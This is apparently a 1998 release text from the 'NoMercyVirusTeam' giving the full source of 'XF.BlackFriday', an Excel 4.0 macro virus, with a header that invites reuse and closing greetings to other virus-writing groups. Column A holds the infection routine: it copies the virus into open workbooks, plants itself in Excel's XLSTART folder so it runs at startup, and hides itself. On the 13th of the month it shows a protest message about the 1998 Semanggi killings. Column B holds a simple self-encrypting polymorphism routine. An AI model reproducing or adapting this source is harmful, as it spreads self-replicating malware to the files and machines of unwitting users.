
				"The Secret of XF.BlackFriday"
+-----------------------------------------------------------------------------------------------+
|                             http://www.welcome.to/NoMercy.com					|
+-----------------------------------------------------------------------------------------------+
| Author: CrazH of NoMercyVirusTeam								|
| Tester: foxz of NoMercyVirusTeam								|
| Rating: 1st XFPolymorph									|
| Original : Indonesia (the unrest country on 1998)						|
+-----------------------------------------------------------------------------------------------+
| History: 											|
| - XF.Black is one of six viruses from NoMercyVirusTeam that dedicate to the 			|
|   brave students and people who died students in Indonesian for A DEMOCRACY!.			|
|   list of 6 viruses from us (alphabetical order) :						|
|   3. XF.Crazh											|
|   4. XF.Crazh.fixed										|
|   1. XM/XM97.Fucking Police									|
|   2. XM/XM97.Riots										|
|   5. XF.BlackFriday (you see the source now)							|
|   6. WM97.Ketapang										|
| - Enough for te.te..a..te..tee enjoy the source, Feel free for use our tricks, BUT remember	|
|   give us credits (if you respect to other ppl, ppl will respect to you).			|
+-----------------------------------------------------------------------------------------------+
| note:												|
| !!! = we too lazy make comments on this source, learn by your self, if still sun understand,  |
|       naaaa,... you can ask to us. (foxz.nomercy@usa.net)					|
| !!! = the original text ONLY can be found on Codebreakers #5 and NoMercySite.			|
|       http://www.sourceofkaos.com/homes/nomercy/black_source.txt				|
+-----------------------------------------------------------------------------------------------+

  +-------------------------------------------------------------------------------------------
  |						A 						
  +---------------------------------------------------------------------------------------------
 1|=ON.SHEET(,"crazh",TRUE)                                
 2|=RETURN()
 3|=RUN($A$32)					
 4|=IF(ISNA($A$46),GOTO($A$7),GOTO($A$5))
 5|=     RETURN()
 6|=END.IF()
 7|=WORKBOOK.COPY("["&$A$43&"]"&"blackfriday",$A$47,1)
 8|=RETURN()
 9|=SET.VALUE($A$47,GET.WINDOW(31))
10|=SET.VALUE($A$44,(GET.WORKSPACE(23) &"\xl5glry.xls"))
11|=RETURN()
12|#VALUE!
13|=ECHO(FALSE)
14|=SET.VALUE($A$48,GET.WINDOW(31))
15|=IF(ISNA(FILES($A$44)="xl5glry.xls"),GOTO($A$16),GOTO($A$35))
16|=NEW(1)
17|=RUN($A$9)
18|=ACTIVATE($A$48)
19|=WORKBOOK.COPY("blackfriday",$A$47,1)
20|=RUN($A$32)
21|=ERROR(FALSE)
22|=MESSAGE(TRUE,"Ready")
23|=SAVE.AS($A$44)
24|=ERROR(TRUE)
25|=ACTIVATE($A$43)
26|=RUN(1)
27|=HIDE()
28|=ACTIVATE($A$43)
29|=SAVE()
30|=IF(DAY(NOW())=13,ALERT("Black Friday  in Nov 1998, The Blood Sucker Army have killed our people & our students in Semanggi Clash",2),GOTO($A$31))
31|=RETURN()
32|=SET.VALUE($A$47,GET.WINDOW(31))
33|=SET.VALUE($A$46,GET.DOCUMENT(3,"["&$A$47&"]"&"blackfriday"))
34|=RETURN()
35|=IF(ISNA($A$48),GOTO($A$36),GOTO($A$40))
36|=NEW(5)
37|=ACTIVATE($A$43)
38|=RUN($A$1)
39|=RETURN()
40|=ACTIVATE($A$43)
41|=IF(DAY(NOW())=13,ALERT("[XF.Semanggi] brought to you by CrazH of NoMercyVirus Team Oct '98",2),GOTO($A$42))
42|=RETURN()
43|xl5glry.xls
44|C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\XLSTART\xl5glry.xls
45|is infected? (3 =yes other value no)
46|3
47|Sheet1
48|xl5glry.xls

  +-------------------------------------------------------------------------------------------
  |						B 						
  +---------------------------------------------------------------------------------------------
 1|78
 2|[C]razh [L]ame [E]ncryption [C]ode
 3|ev=ROUND(RAND()* (128-1)*1,0)
 4|=SET.VALUE(B1,ev)
 5|=FOR.CELL("z",A1:A41)
 6|=FORMULA(CHAR(39)&GET.CELL(6,z),z)
 7|=NEXT()
 8|=  FOR.CELL("k",A1:A41)
 9|       xz=""
10|=        FOR("l",1,LEN(k))
11|                xz= xz&CHAR(CODE(MID(k,l,1))+B1)
12|=        NEXT()
13|=        SET.VALUE(k,xz)
14|=  NEXT()
15|"=IF(GET.WINDOW(7),GOTO(B16),GOTO(B19))
16|=ACTIVATE(A43)
17|=MESSAGE(TRUE,"Ready")
18|=SAVE()
19|=RETURN()
20|decrypt
21|=  FOR.CELL("k",A1:A41)
22|       xz=""
23|=ERROR(FALSE)
24|=        FOR("l",1,LEN(k))
25|                xz= xz&CHAR(CODE(MID(k,l,1))-B1)
26|=        NEXT()
27|=        SET.VALUE(k,xz)
28|=  NEXT()
29|"=RETURN()
30|convert text into formula before RUNNING IT
31|=FOR.CELL("h",A1:A41)
32|=ERROR(FALSE)
33|=FORMULA(FORMULA.CONVERT(h,1,0,1),h)
34|=NEXT()
35|=GOTO(A12)
36|=RETURN()


+-----------------------------------------------------------------------------------------------+
| ops we forget some thing :) NoMercyVirusTeam NEVER release any product/text without greetz,...|
| 1...2...3... go...										|
| - All NoMercyVirusTeam Members (slagy, asmheady, knowdy, crazy, and foxzy)			|
| - All Codebreakers Members (spooky, evily, serially, opicsy and friends)			|
| - All 29A Members (darky, VB and friends)							|
| - All MetaPhase Teams (knowy and friends)							|
| - All SLAM team (RAiDy, VD and friends)							|
| - All ppl on #vir (Mr.Nuc, Mr.Rhape, Mr.T, Mr.Q, and All.... that i forgot to write)          |
| - Vrtik and Valky "this is may be usefull for you!!"						|
| - Indonesian Students "adili $uharto dan kroni-kroninya"					|
+-----------------------------------------------------------------------------------------------+
